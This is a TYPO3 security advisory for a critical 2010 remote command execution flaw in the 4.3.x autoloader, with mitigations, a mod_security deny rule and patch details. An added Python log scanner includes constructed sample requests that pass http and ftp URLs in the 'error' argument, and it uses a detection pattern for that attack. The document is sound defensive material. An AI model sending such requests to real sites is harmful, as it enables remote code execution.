TYPO3-SA-2010-008: Vulnerability in TYPO3 Core

Categories: TYPO3 CMS

Created by Marcus Krause

It has been discovered that TYPO3 Core is vulnerable to Remote Command Execution.

Component Type: TYPO3 Core

Affected Versions: 4.3.0, 4.3.1 and 4.3.2 (+ development releases of 4.4 branch)

Vulnerability Types: Remote Command Execution

Overall Severity: Critical

Release Date: April 9, 2010

Vulnerable subcomponent: TYPO3 autoloader

Vulnerability Type: Remote Command Execution

Severity: Critical

Suggested CVSS v2.0: AV:N/AC:H/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C

Problem Description: The TYPO3 autoloader does not validate passed arguments.

You are not vulnerable if at least one of the following conditions is met:

  1. You are using a TYPO3 version other than 4.3.0, 4.3.1 or 4.3.2 (+ development releases of 4.4 branch).
  2. You have at least one of the following PHP configuration variables set to "off": register_globals ("off" by default, advised to be "off" in the TYPO3 Security Cookbook), allow_url_include ("off" by default) and allow_url_fopen ("on" by default).
  3. You are using Suhosin and haven't put URL schemes in the configuration variable "suhosin.executor.include.whitelist".

Possible Impact: A crafted request to a vulnerable TYPO3 installation will allow an attacker to load PHP code from an external server and to execute it on the TYPO3 installation.

Solution: You can choose one of the solutions below:

  1. Update to TYPO3 version 4.3.3, which fixes the problem described!
  2. Set at least one of the following PHP configuration variables to "off": register_globals, allow_url_include and allow_url_fopen
  3. Apply the patch that is linked below!
  4. Replace all files that are part of the security fix by using the zip archive that is linked below!
  5. Set up a mod_security rule:
    SecRule  ARGS:error  "^(https?|ftp)"  "deny"
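
Because the issue has already been exploited, the same pattern can also be applied to existing access logs. The following is an added example, not part of the original advisory or of TYPO3: it assumes Apache common/combined log format, the function names are hypothetical, and the log entries are constructed. Access logs only show query-string arguments, while ARGS in the rule also covers POST arguments.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Same pattern as the advisory's rule: ARGS:error "^(https?|ftp)".
# Matched case-insensitively here, which is broader than the rule as written.
SCHEME_RE = re.compile(r"^(https?|ftp)", re.IGNORECASE)
# Request line inside an Apache common/combined log entry (assumed log format).
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')


def suspicious_error_args(uri):
    """Return values of the 'error' query argument that the rule would deny."""
    query = urlsplit(uri).query
    # parse_qsl URL-decodes names and values, so percent-encoded schemes match too.
    return [value for name, value in parse_qsl(query, keep_blank_values=True)
            if name == "error" and SCHEME_RE.match(value)]


def scan_access_log(lines):
    """Return (line_number, client, uri) for every entry the rule would deny."""
    hits = []
    for number, line in enumerate(lines, start=1):
        entry = REQUEST_RE.match(line)
        if entry and suspicious_error_args(entry.group("uri")):
            hits.append((number, entry.group("client"), entry.group("uri")))
    return hits


# Constructed sample entries (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Apr/2010:10:00:01 +0200] "GET /?id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Apr/2010:10:00:05 +0200] "GET /?error=http://host.invalid/a HTTP/1.1" 200 0',
    '192.0.2.11 - - [09/Apr/2010:10:00:09 +0200] "GET /?error=not_found HTTP/1.1" 404 310',
    '198.51.100.7 - - [09/Apr/2010:10:00:12 +0200] "GET /?error=ftp%3A%2F%2Fhost.invalid%2Fa HTTP/1.1" 200 0',
    # The pattern has no "://", so this value matches as well, as it would in the rule.
    '192.0.2.12 - - [09/Apr/2010:10:00:15 +0200] "GET /?error=httpd_down HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for number, client, uri in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {client} requested {uri}")
```

A hit means only that the request matched the pattern; whether it had any effect depends on the version and PHP settings listed above.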

Patch: how to patch

  1. Patch for TYPO3 version 4.3.x (md5 sum: 19fec0afa12e91152811d9c6e9c73cf1)

Files: Extract the archive and replace server files with those that are in the archive

  1. Archive containing safe to use files (md5 sum: fb5e62007c20f8a03b06d1acab1f4c8e)

Note: We have been informed that this vulnerability has already been exploited.

Credits: Credits go to Christian Bülter and Bastian Heiser who discovered and reported the issue and the Security Team members Dmitry Dulepov, Marcus Krause and Helmut Hummel for providing the mod_security rule and the patch.

General Advice: Follow the recommendations that are given in the TYPO3 Security Cookbook. Please subscribe to the typo3-announce mailing list.